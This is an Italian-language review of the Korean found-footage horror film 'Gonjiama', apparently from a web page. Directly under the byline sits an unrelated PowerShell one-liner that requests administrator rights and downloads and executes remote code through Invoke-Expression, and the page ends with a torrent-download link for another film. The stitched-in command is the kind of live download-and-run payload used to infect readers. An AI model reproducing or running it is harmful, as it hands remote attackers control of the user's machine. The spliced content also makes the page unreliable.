Martedì, Aprile 29th/ 2014
– di Sergio Basile (su contributo di Vittoriano Mezzi) –
powershell -Command "Start-Process powershell -ArgumentList '-Command Invoke-Expression (New-Object Net.WebClient).DownloadString(''{PATH}'')' -Verb RunAs"
La troupe di una serie web horror si reca in un manicomio abbandonato per una trasmissione in diretta. Incontra presto molto più di quanto si aspettasse mentre si addentra nel vecchio edificio infestato. I registi non sono riusciti a ottenere il permesso dal governo sudcoreano per filmare in un vero ospedale, quindi le scene del film ambientate a Gonjiama sono state in realtà girate alla Busan National Naval High School, con il team di produzione che si è attenuto strettamente alla planimetria dell’ospedale per creare esattamente gli stessi esterni e corridoi…
Ovviamente sta rispondendo e sorridendo a chiunque sia. Quanto si ottiene da questo horror coreano found footage dipenderà dalla propria mentalità per questo particolare sottogenere. Niente di veramente nuovo qui: pensa alla linea di “Grave Encounters” ma meglio eseguito utilizzando una tecnologia migliorata per trasmettere in streaming in diretta qualsiasi incontro paranormale.
L’ipotesi è ben consolidata; un piccolo gruppo della serie web horror “Horror Time” Prendete le vostre telecamere ed esplorate un manicomio abbandonato e isolato a tarda notte per una trasmissione in diretta. Non sorprende come si svilupperà la situazione, ma l’atmosfera è tesa. Puro terrore, ombre incombenti e scricchiolii avvolgono un luogo umido e incolore che semplicemente ti avvolge.
Mi ha ricordato molto il tono/atmosfera di Session 9, forse anche di più inquietante. Dopo un inizio lento, l’introduzione dei personaggi, le dinamiche della chimica e un po’ di storia del manicomio, inclusi altri amanti del brivido che sono scomparsi dopo essere entrati nell’edificio. Tutto funziona abbastanza decentemente, tranne per gli spaventi improvvisi obbligatori e il malfunzionamento delle attrezzature.
Ciò che all’inizio sembrava una trama semplice si è rivelata avere una sorpresa o due nella manica nella sua nicchia paranormale, incentrata sulla stanza maledetta 402. C’erano alcuni elementi scenici abbastanza efficaci, ma probabilmente non abbastanza incidenti in quello che sembra carino. Tuttavia, i momenti che riusciamo a vedere, e ce ne sono almeno 3 o 4, sono momenti emozionanti ben girati.
https://whimmarques.com/2024/12/10/the-order-2024-2024-torrent-download/